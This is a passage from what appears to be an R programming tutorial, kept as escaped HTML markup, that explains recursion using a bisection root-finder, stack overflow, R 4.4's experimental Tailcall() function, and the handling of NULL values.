&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; midpoint &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (lhs &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; rhs) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; f_mid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;f&lt;/span&gt;(midpoint)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; new_interval &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sign&lt;/span&gt;(f_mid) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sign&lt;/span&gt;(f_left)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(midpoint, rhs)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(lhs, midpoint)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;bisect&lt;/span&gt;(f, new_interval, tolerance, iteration &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, verbose)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We know that &lt;em&gt;π&lt;/em&gt; is somewhere between 3 and 4, so we can find the zero
of &lt;code&gt;sin(x)&lt;/code&gt; as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;bisect&lt;/span&gt;(sin, interval &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;), tolerance &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1e-4&lt;/span&gt;, verbose &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 1: Interval [3, 4]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 2: Interval [3, 3.5]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 3: Interval [3, 3.25]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 4: Interval [3.125, 3.25]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 5: Interval [3.125, 3.1875]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 6: Interval [3.125, 3.15625]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 7: Interval [3.140625, 3.15625]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 8: Interval [3.140625, 3.1484375]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 9: Interval [3.140625, 3.14453125]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 10: Interval [3.140625, 3.142578125]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Iteration 11: Interval [3.140625, 3.1416015625]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 3.141602&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It takes 11 iterations to get to a point where &lt;code&gt;sin(x)&lt;/code&gt; is within
10&lt;sup&gt;−4&lt;/sup&gt; of zero. If we tightened the tolerance, had a more
complicated function, or had a less precise starting range, it might
take many more iterations to approximate a zero.&lt;/p&gt;
&lt;p&gt;Importantly, this is a recursive algorithm - in the last statement of
the &lt;code&gt;bisect()&lt;/code&gt; function body, we call &lt;code&gt;bisect()&lt;/code&gt; again. The initial call
to &lt;code&gt;bisect()&lt;/code&gt; (with &lt;code&gt;interval = c(3, 4)&lt;/code&gt;) has to wait until the second
call to &lt;code&gt;bisect()&lt;/code&gt; (&lt;code&gt;interval = c(3, 3.5)&lt;/code&gt;) completes before it can
return (which in turn has to wait for the third call to return). So we
have to wait for 11 calls to &lt;code&gt;bisect()&lt;/code&gt; to complete before we get our
result.&lt;/p&gt;
&lt;p&gt;Those function calls get placed on a computational object named the
&lt;a href="https://en.wikipedia.org/wiki/Call_stack" rel="external"&gt;call stack&lt;/a&gt;. For each
function call, this stores details about how the function was called and
where from. While waiting for the first call to &lt;code&gt;bisect()&lt;/code&gt; to complete,
the call stack grows to include the details about 11 calls to
&lt;code&gt;bisect()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Imagine our algorithm didn’t just take 11 function calls to complete,
but thousands, or millions. The call stack would get really full and
this would lead to a &lt;a href="https://en.wikipedia.org/wiki/Stack_overflow" rel="external"&gt;“stack overflow”
error&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We can demonstrate a stack-overflow in R quite easily:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;blow_up &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(n, max_iter) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (n &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; max_iter) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Finished!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;blow_up&lt;/span&gt;(n &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, max_iter)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The recursive function behaves nicely when we only use a small number of
iterations:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;blow_up&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, max_iter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Finished!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But the call-stack gets too large and the function fails when we attempt
to use too many iterations. Note that we get a warning about the size of
the call-stack before we actually reach it’s limit, so the R process can
continue after exploding the call-stack.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;blow_up&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, max_iter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1000000&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Error: C stack usage 7969652 is too close to the limit&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In R 4.4, we are getting (experimental) support for &lt;a href="https://en.wikipedia.org/wiki/Tail_call" rel="external"&gt;tail-call
recursion&lt;/a&gt;. This allows us (in
many situations) to write recursive functions that won’t explode the
size of the call stack.&lt;/p&gt;
&lt;p&gt;How can that work? In our &lt;code&gt;bisect()&lt;/code&gt; example, we still need to make 11
calls to &lt;code&gt;bisect()&lt;/code&gt; to get a result that is close enough to zero, and
those 11 calls will still need to be put on the call-stack.&lt;/p&gt;
&lt;p&gt;Remember the first call to &lt;code&gt;bisect()&lt;/code&gt;? It called &lt;code&gt;bisect()&lt;/code&gt; as the very
last statement in it’s function body. So the value returned by the
second call to &lt;code&gt;bisect()&lt;/code&gt; was returned to the user without modification
by the first call. So we could return the second call’s value directly
to the user, instead of returning it via the first &lt;code&gt;bisect()&lt;/code&gt; call;
indeed, we could remove the first call to &lt;code&gt;bisect()&lt;/code&gt; from the call stack
and put the second call in it’s place. This would prevent the call stack
from expanding with recursive calls.&lt;/p&gt;
&lt;p&gt;The key to this (in R) is to use the new &lt;code&gt;Tailcall()&lt;/code&gt; function. That
tells R “you can remove me from the call stack, and put this cat on
instead”. Our final line in &lt;code&gt;bisect()&lt;/code&gt; should look like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bisect &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt; snip &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Tailcall&lt;/span&gt;(bisect, f, new_interval, tolerance, iteration &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, verbose)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that you are passing the name of the recursively-called function
into &lt;code&gt;Tailcall()&lt;/code&gt;, rather than a call to that function (&lt;code&gt;bisect&lt;/code&gt; rather
than &lt;code&gt;bisect(...)&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;To illustrate that the stack no longer blows up when tail-call recursion
is used. Let’s rewrite our &lt;code&gt;blow_up()&lt;/code&gt; function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.4.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;blow_up &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(n, max_iter) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (n &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; max_iter) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Finished!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Tailcall&lt;/span&gt;(blow_up, n&lt;span style="color:#a5d6ff"&gt;+1&lt;/span&gt;, max_iter)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can still successfully use a small number of iterations:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;blow_up&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Finished!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But now, even a million iterations of the recursive function can be
performed:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;blow_up&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1000000&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Finished!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the tail-call optimisation only works here, because the
recursive call was made as the very last step in the function body. If
your function needs to modify the value after the recursive call, you
may not be able to use &lt;code&gt;Tailcall()&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="rejecting-the-null"&gt;Rejecting the NULL&lt;/h3&gt;
&lt;p&gt;Missing values are everywhere.&lt;/p&gt;
&lt;p&gt;In a typical dataset you might have missing values encoded as &lt;code&gt;NA&lt;/code&gt; (if
you’re lucky) and invalid numbers encoded as &lt;code&gt;NaN&lt;/code&gt;, you might have
implicitly missing rows (for example, a specific date missing from a
time series) or factor levels that aren’t present in your table. You
might even have empty vectors, or data-frames with no rows, to contend
with. When writing functions and data-science workflows, where the input
data may change over time, by programming defensively and handling these
kinds of edge-cases your code will throw up less surprises in the long
run. You don’t want a critical report to fail because a mathematical
function you wrote couldn’t handle a missing value.&lt;/p&gt;
&lt;p&gt;When programming defensively with R, there is another important form of
missingness to be cautious of …&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://stat.ethz.ch/R-manual/R-devel/library/base/html/NULL.html" rel="external"&gt;&lt;code&gt;NULL&lt;/code&gt;
object&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;NULL&lt;/code&gt; is an actual object. You can assign it to a variable, combine it
with other values, index into it, pass it into (and return it from) a
function. You can also test whether a value is &lt;code&gt;NULL&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Assignment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_null &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_null
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Use in functions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_null[1]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;123&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 123&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toupper&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; character(0)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Testing NULL-ness&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(my_null)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;identical&lt;/span&gt;(my_null, &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Note that the equality operator shouldn&amp;#39;t be used to&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# test NULL-ness:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; logical(0)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;R functions that are solely called for their side-effects (&lt;code&gt;write.csv()&lt;/code&gt;
or &lt;code&gt;message()&lt;/code&gt;, for example) often return a &lt;code&gt;NULL&lt;/code&gt; value. Other
functions may return &lt;code&gt;NULL&lt;/code&gt; as a valid value - one intended for
subsequent use. For example, list-indexing (which is a function call,
under the surface) will return &lt;code&gt;NULL&lt;/code&gt; if you attempt to access an
undefined value:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;config &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(user &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Russ&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# When the index is present, the associated value is returned&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;config&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;user
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Russ&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# But when the index is absent, a `NULL` is returned&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;config&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;url
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Similarly, you can end up with a &lt;code&gt;NULL&lt;/code&gt; output from an incomplete stack
of &lt;code&gt;if&lt;/code&gt; / &lt;code&gt;else&lt;/code&gt; clauses:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;language &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Polish&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;greeting &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (language &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;English&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;} &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (language &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hawaiian&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Aloha&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;greeting
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
